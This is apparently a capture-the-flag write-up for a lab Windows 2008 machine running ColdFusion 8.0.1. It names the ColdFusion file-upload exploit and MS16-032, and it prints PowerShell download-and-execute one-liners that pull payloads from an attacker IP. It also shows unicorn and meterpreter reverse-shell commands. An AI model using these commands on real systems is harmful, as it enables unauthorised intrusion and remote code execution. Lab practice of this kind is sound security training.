OS: Windows 2008
Ports / Services / Software versions running
135/tcp open msrpc Microsoft Windows RPC8500/tcp open http JRun Web Server49154/tcp open msrpc Microsoft Windows RPC
ColdFusion 8.0.1 Arbitrary File Upload and Execute
This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.
MS16-032 Secondary Logon Handle Privilege Escalation
This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
Replicating the exploit:
Webapp on port 8500
Administrator gives a version 8
Found the metasploit version of the exploit
Set options as follows
Start burp listener on port 127.0.0.1:8500Check it works in the browser
Capture the request in burp
Check the filename it is writing to.
Navigate to that file via the browser and set up your nc listener on port 4444
Gather system info etc
Grab user fileExecute Sherlock.ps1 after copying it to your pwd and starting your webserver.
echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1") | powershell -noprofile -
Did not work so try getting a meterpreter shell instead.
git clone https://github.com/trustedsec/unicorn.git
python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 4445
msfconsole -r unicorn.rc
cat powershell_attack.txt > exploit.html
Nano exploit.htmlDelete powershell etc to “sv including the single quote and the quote at the end.
Copy to your webserver
Run the following on Arctic
powershell "iex(new-object net.webclient).downloadstring('http://10.10.14.2/exploit.html')"
Run local exploit suggester (32 bit)
This ran as 32 bit so switch to meterpreter and change to a 64 bit process
Only one as 64 bit
Set your options as follows:
Run the exploit to get a system shell.